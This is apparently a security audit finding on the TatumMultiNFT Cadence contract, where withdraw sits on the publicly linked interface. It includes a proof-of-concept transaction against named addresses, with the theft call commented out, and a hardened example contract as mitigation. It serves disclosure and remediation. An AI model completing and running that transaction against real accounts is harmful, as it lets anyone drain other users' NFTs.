TatumMultiNFT contract

Details

// line 36
pub resource interface TatumMultiNftCollectionPublic {
    // withdraw is declared on the *public* interface, so anyone holding the public capability can call it
    pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT
    // remaining interface members not shown
}

In line 156, the withdraw functionality is exposed in the TatumMultiNftCollectionPublic resource interface. Because the TatumMultiNftCollectionPublic interface is the type linked publicly to expose certain functions of the Collection resource, an attacker can steal all NFTs by borrowing the public capability linked at CollectionPublicPath and calling the withdraw function on it.

Pseudocode

Below is an example transaction code that illustrates the attack.

import TatumMultiNFT from 0x354e6721564ccd2c

transaction() {

    execute {
        // any account that holds a TatumMultiNFT collection; no signer authorization is needed
        let account = getAccount(0xac3ac01b20852170)

        // the public capability is typed with the interface that (wrongly) includes withdraw
        let cap = account.getCapability<&{TatumMultiNFT.TatumMultiNftCollectionPublic}>(TatumMultiNFT.CollectionPublicPath).borrow()!

        let availableNFTs = cap.getIDs()

        for nft in availableNFTs {
            // withdraw is callable through the public reference; the call is left commented out here
            //  let res <- cap.withdraw(withdrawID: nft)
        }

    }
}

Mitigation

Consider removing the withdraw functionality from the public interface in line 36, so that withdraw remains reachable only through a reference the collection owner holds (for example via NonFungibleToken.Provider linked under a private path), never through the capability at CollectionPublicPath.
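The following is an added example contract in pre-1.0 Cadence syntax (not Tatum's code) showing the hardened shape of the public interface: withdraw is implemented on the Collection only via NonFungibleToken.Provider, and only the restricted CollectionPublic interface is linked at the public path. The contract name, the storage/public paths and the NonFungibleToken import address are placeholders.

```cadence
import NonFungibleToken from 0x01 // placeholder: use the network's NonFungibleToken address
pub contract SafeMultiNFT: NonFungibleToken {
    pub var totalSupply: UInt64
    pub let CollectionStoragePath: StoragePath
    pub let CollectionPublicPath: PublicPath
    pub event ContractInitialized()
    pub event Withdraw(id: UInt64, from: Address?)
    pub event Deposit(id: UInt64, to: Address?)
    pub resource NFT: NonFungibleToken.INFT {
        pub let id: UInt64
        init(id: UInt64) { self.id = id }
    }
    // Hardened public interface: deposit and read-only views only; no withdraw.
    pub resource interface CollectionPublic {
        pub fun deposit(token: @NonFungibleToken.NFT)
        pub fun getIDs(): [UInt64]
        pub fun borrowNFT(id: UInt64): &NonFungibleToken.NFT
    }
    pub resource Collection: CollectionPublic, NonFungibleToken.Provider, NonFungibleToken.Receiver, NonFungibleToken.CollectionPublic {
        pub var ownedNFTs: @{UInt64: NonFungibleToken.NFT}
        init() { self.ownedNFTs <- {} }
        // Required by NonFungibleToken.Provider; reachable only via an owner-held or /private reference.
        pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT {
            let token <- self.ownedNFTs.remove(key: withdrawID) ?? panic("missing NFT")
            emit Withdraw(id: token.id, from: self.owner?.address)
            return <-token
        }
        pub fun deposit(token: @NonFungibleToken.NFT) {
            let token <- token as! @SafeMultiNFT.NFT
            let id = token.id
            let old <- self.ownedNFTs[id] <- token
            emit Deposit(id: id, to: self.owner?.address)
            destroy old
        }
        pub fun getIDs(): [UInt64] { return self.ownedNFTs.keys }
        pub fun borrowNFT(id: UInt64): &NonFungibleToken.NFT { return (&self.ownedNFTs[id] as &NonFungibleToken.NFT?)! }
        destroy() { destroy self.ownedNFTs }
    }
    pub fun createEmptyCollection(): @NonFungibleToken.Collection { return <- create Collection() }
    init() {
        self.totalSupply = 0
        self.CollectionStoragePath = /storage/safeMultiNFTCollection // placeholder path
        self.CollectionPublicPath = /public/safeMultiNFTCollection   // placeholder path
        self.account.save(<- create Collection(), to: self.CollectionStoragePath)
        // Link only the restricted interface publicly, never `&Collection` itself.
        self.account.link<&Collection{CollectionPublic}>(self.CollectionPublicPath, target: self.CollectionStoragePath)
        emit ContractInitialized()
    }
}
```

A borrow of `&{SafeMultiNFT.CollectionPublic}` from the public path, as in the transaction above, would then fail to type-check on any `withdraw` call.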

Reference

Cadence Anti-Patterns

Patch commit

fix vulnerability · tatumio/flow-contracts@ebf2cdd

Transaction hash